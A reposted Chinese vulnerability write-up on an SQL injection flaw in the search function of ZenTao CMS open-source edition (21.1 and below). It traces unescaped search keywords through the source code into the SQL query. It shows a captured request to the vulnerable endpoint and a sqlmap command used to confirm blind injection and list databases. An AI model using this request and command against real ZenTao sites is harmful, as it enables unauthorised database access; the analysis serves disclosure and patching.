原文链接:https://xz.aliyun.com/t/16976
作者:1629192581190874
禅道CMS开源版存在SQL注入漏洞官网:https://www.zentao.net/影响版本:开源版21.1及以下版本漏洞类型:SQL注入漏洞url:http://192.168.88.9//index.php?m=search&f=index&words=2&type=all&zin=1
漏洞数据包(请手动抓包验证漏洞):
GET /index.php?m=search&f=index&words=1&type=all&zin=1 HTTP/1.1Host: 192.168.88.6User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0Accept:/Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflate, brReferer:http://192.168.88.6/X-ZIN-Options: {"selector":["#configJS","title>","body>*"],"type":"list"}X-ZIN-App: searchX-Zin-Cache-Time: 0X-Requested-With: XMLHttpRequestConnection: keep-aliveCookie: zentaosid=d5ikdmm295l1ca5ec4an8p4f7u; lang=zh-cn; vision=rnd; device=desktop; theme=default; keepLogin=on; za=admin; zp=abd630d8e942046184fb94d4e591e66cd011665a; hideMenu=false; tab=searchPriority: u=4
随便输入一点东西进行搜索
对源码进行审计:根据路由来到modulesearch control.php在index这个方法中,words 参数被直接传递给 getList 方法,而 getList 方法在 model.php 中定义
接着来到 model.php,words 参数主要在 getList 方法中使用,在这个方法中,keywords 参数被传递给 getSqlParams 方法,并且 againstCond 和 likeCondition 被直接插入到 SQL 查询中。
再接着来到modulesearchtao.php分析getSqlParams 方法
这里存在 SQL 注入漏洞,因为 keywords 参数没有进行任何过滤或转义处理。
在 againstCond 的拼接过程中,每个单词被直接添加到查询条件中,没有进行任何过滤或转义处理。如果 $word 是单引号('),它会被包含在 + 运算符和双引号内,导致生成的 SQL 查询语句不正确。likeCondition 直接将 $keywords 插入到 SQL 查询中,没有进行任何过滤或转义处理。如果 $keywords 包含特殊字符(如单引号等),会导致生成的 SQL 查询语句不正确,从而产生 SQL 注入漏洞。
$keywords 变量的处理会将这个单引号字符传递给 $against 和 $againstCond。最终生成的 SQL 查询语句中会出现不正确的字符,导致 SQL 注入漏洞。
上述分析后接下来对搜索功能的数据包进行抓包并把参数加入*号 放入sqlmap进行测试
命令如下:python sqlmap.py -r 1.txt --level=5 --risk=3 --threads=10 --dbms=mysql
扫描出多个盲注
执行—dbs尝试查询数据库验证漏洞
验证成功,到此结束
原文始发于微信公众号(神农Sec):禅道CMS开源版SQL注入漏洞分析
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论